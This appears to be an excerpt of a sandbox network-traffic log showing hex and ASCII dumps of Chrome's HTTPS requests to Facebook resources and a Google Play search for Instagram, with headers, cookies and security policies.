                                                                                                                                                                                                                                Data Ascii: _ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_INSTAGRAM_BUSINESS_PERSON":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false,
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1500INData Raw: 6c 79 66 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 7d 2c 32 31 39 30 5d 2c 5b 22 4a 53 45 72 72 6f 72 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 61 70 70 49 64 22 3a 32 35 36 32 38 31 30 34 30 35 35 38 2c 22 65 78 74 72 61 22 3a 5b 5d 2c 22 72 65 70 6f 72 74 49 6e 74 65 72 76 61 6c 22 3a 35 30 2c 22 73 61 6d 70 6c 65 57 65 69 67 68 74 22 3a 6e 75 6c 6c 2c 22 73 61 6d 70 6c 65 57 65 69 67 68 74 4b 65 79 22 3a 22 5f 5f 6a 73 73 65 73 77 22 2c 22 70 72 6f 6a 65 63 74 42 6c 6f 63 6b 6c 69 73 74 22 3a 5b 5d 7d 2c 32 37 37 36 5d 2c 5b 22 44 61 74 61 53 74 6f 72 65 43 6f 6e 66 69 67 22 2c
                                                                                                                                                                                                                                Data Ascii: lyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["JSErrorLoggingConfig",[],{"appId":256281040558,"extra":[],"reportInterval":50,"sampleWeight":null,"sampleWeightKey":"__jssesw","projectBlocklist":[]},2776],["DataStoreConfig",
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1500INData Raw: 63 72 3a 37 33 38 36 22 2c 5b 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 57 57 57 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 57 57 57 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 33 39 30 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 57 57 57 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 54 69 6d 65 6f 75 74 57 57 57 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 30 33 32 36 37 22 2c 5b 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 36 34 36 32 22 2c 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65
                                                                                                                                                                                                                                Data Ascii: cr:7386",["clearTimeoutWWW"],{"__rc":["clearTimeoutWWW",null]},-1],["cr:7390",["setTimeoutWWW"],{"__rc":["setTimeoutWWW",null]},-1],["cr:1003267",["clearIntervalBlue"],{"__rc":["clearIntervalBlue",null]},-1],["cr:896462",["setIntervalAcrossTransitionsBlue
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC1500INData Raw: 7a 65 72 6f 5c 2f 70 6f 6c 69 63 79 5c 2f 6f 70 74 69 6e 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 77 72 69 74 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 6c 65 67 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 66 72 65 65 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 75 70 64 61 74 65 5c 2f 22 3a 31 2c 22 5c 2f 70 72 69 76 61 63 79 5c 2f 65 78 70 6c 61 6e 61 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 74 6f 67 67 6c 65 5c 2f 77 65 6c 63 6f 6d 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 74 6f 67 67 6c 65 5c 2f 6e 75 78 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 74 6f 67 67
                                                                                                                                                                                                                                Data Ascii: zero\/policy\/optin":1,"\/zero\/optin\/write\/":1,"\/zero\/optin\/legal\/":1,"\/zero\/optin\/free\/":1,"\/about\/privacy\/":1,"\/about\/privacy\/update\/":1,"\/privacy\/explanation\/":1,"\/zero\/toggle\/welcome\/":1,"\/zero\/toggle\/nux\/":1,"\/zero\/togg


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                93192.168.2.449846157.240.0.64432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:26 UTC375OUTGET /rsrc.php/v3/y0/r/eFZD1KABzRA.png HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:27 UTC1876INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: ZFLtdcU+Go6QpmTfGJWakA==
                                                                                                                                                                                                                                Expires: Thu, 18 Sep 2025 16:10:20 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: Ra1mru2Mhi/0txUabKLJ1IQFbC0icc/rFc4GHoAyvbjYPxFNeLQD/Onjc78fEwuO7kULSwieAIsIhMh3uWZyNg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:27 GMT
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=90, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 2106
                                                                                                                                                                                                                                2024-09-29 04:54:27 UTC1INData Raw: 89
                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                2024-09-29 04:54:27 UTC2102INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 03 00 00 00 65 02 9c 35 00 00 01 59 50 4c 54 45 47 70 4c 05 65 ff 08 65 ff 07 65 ff 10 70 ff 07 65 ff 08 66 ff 08 66 ff 08 68 ff 08 66 ff 07 66 ff 00 60 ff 10 60 ff ff ff ff 08 67 ff 07 66 ff 08 66 ff 08 67 ff 08 67 ff 08 66 ff 08 66 ff 08 66 ff 08 67 ff 07 66 ff 08 68 ff 09 65 ff 08 66 ff 08 64 ff 09 67 ff 07 65 ff 07 65 ff 06 63 ff 0a 66 ff 07 66 ff 08 65 ff 07 66 ff 09 67 ff 06 67 ff 08 65 ff 08 66 ff 08 66 ff ff ff ff ff ff ff 08 69 ff 08 68 ff 07 65 ff 09 66 ff 07 66 ff ff ff ff 0b 65 ff ff ff ff ff ff ff 07 65 ff 07 67 ff 07 66 ff 07 66 ff 0a 66 ff 09 66 ff 07 66 ff 09 66 ff 07 67 ff ff ff ff ff ff ff 06 66 ff 08 65 ff 07 65 ff ff ff ff 87 b7 ff 46 8c ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                Data Ascii: PNGIHDRe5YPLTEGpLeeepeffhff``gffggfffgfhefdgeecffefggeffiheffeegffffffgfeeF
                                                                                                                                                                                                                                2024-09-29 04:54:27 UTC3INData Raw: 42 60 82
                                                                                                                                                                                                                                Data Ascii: B`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                94192.168.2.449923157.240.253.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:34 UTC1198OUTPOST /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923890061341413&__req=4&__rev=1016900551&__s=fcmjky%3Ao76ejb%3A95nhjd&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585655&__user=0&dpr=1&jazoest=21020&locale=ru_RU&lsd=AVrwfIkMup0 HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 1665
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySZ5TR64oT0QYAvvl
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
                                                                                                                                                                                                                                2024-09-29 04:54:34 UTC1665OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 53 5a 35 54 52 36 34 6f 54 30 51 59 41 76 76 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 73 22 0d 0a 0d 0a 31 37 32 37 35 38 35 36 37 32 35 35 31 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 53 5a 35 54 52 36 34 6f 54 30 51 59 41 76 76 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 71 22 0d 0a 0d 0a 5b 7b 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 70 6f 73 74 73 22 3a 22 7a 51 2b 41 57 31 73 69 5a 6d 46 73 59 32 38 36 62 32 52 7a 58 33 64 6c 59 6c 39 69 59 58 52 6a
                                                                                                                                                                                                                                Data Ascii: ------WebKitFormBoundarySZ5TR64oT0QYAvvlContent-Disposition: form-data; name="ts"1727585672551------WebKitFormBoundarySZ5TR64oT0QYAvvlContent-Disposition: form-data; name="q"[{"app_id":"256281040558","posts":"zQ+AW1siZmFsY286b2RzX3dlYl9iYXRj
                                                                                                                                                                                                                                2024-09-29 04:54:34 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923971999363372", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923971999363372"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                2024-09-29 04:54:34 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                2024-09-29 04:54:34 UTC1926INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                95192.168.2.449949157.240.251.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:35 UTC871OUTGET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923890061341413&__req=4&__rev=1016900551&__s=fcmjky%3Ao76ejb%3A95nhjd&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585655&__user=0&dpr=1&jazoest=21020&locale=ru_RU&lsd=AVrwfIkMup0 HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
                                                                                                                                                                                                                                2024-09-29 04:54:35 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923976004909203", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923976004909203"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                2024-09-29 04:54:35 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                2024-09-29 04:54:35 UTC1705INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                96192.168.2.449977142.250.184.2064432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:39 UTC818OUTGET /store/search?q=instagram&c=apps&hl=ru&gl=US HTTP/1.1
                                                                                                                                                                                                                                Host: play.google.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:39 UTC4051INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                x-ua-compatible: IE=edge
                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:39 GMT
                                                                                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups
                                                                                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-2lVpURGzt2w3GjFBdWyK-A' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /_/PlayStoreUi/cspreport;worker-src 'self'
                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com https://market.android.com https://clients2.google.com https://payments.sandbox.google.com https://payments.google.com https://maps.googleapis.com https://translate.googleapis.com https://translate.google.com https://support.google.com https://www.gstatic.cn https://families.google.com https://clients1.google.com https://myaccount.google.com https://accounts.google.com https://support.google.com/inapp/ https://www.google.com/tools/feedback/ https://www.gstatic.com/inproduct_help/ https://www.gstatic.com/support/content/ https://www.googleapis.com/appsmarket/v2/installedApps/;report-uri /_/PlayStoreUi/cspreport/allowlist
                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/PlayStoreUi/cspreport
                                                                                                                                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://www.googletagmanager.com/gtag/js https://www.google-analytics.com/analytics.js https://www.googletagmanager.com/gtag/destination https://www.gstatic.com/_/mss/boq-one-google/_/ https://www.gstatic.com/og/_/js/ https://apis.google.com/js/api.js https://apis.google.com/js/client.js https://www.google.com/tools/feedback/load.js https://www.google.com/tools/feedback/open.js https://www.gstatic.com/inproduct_help/service/lazy.min.js https://www.gstatic.com/inproduct_help/api/main.min.js https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js https://www.gstatic.com/uservoice/feedback/client/web/live/ https://www.google.com/tools/feedback/chat_load.js https://www.gstatic.com/uservoice/surveys/resources/prod/js/survey/ https://www.gstatic.com/feedback/js/ghelp/ https://www.google.com/js/bg/ https://www.gstatic.com/_/boq-play/_/js/k=boq [TRUNCATED]
                                                                                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: same-site
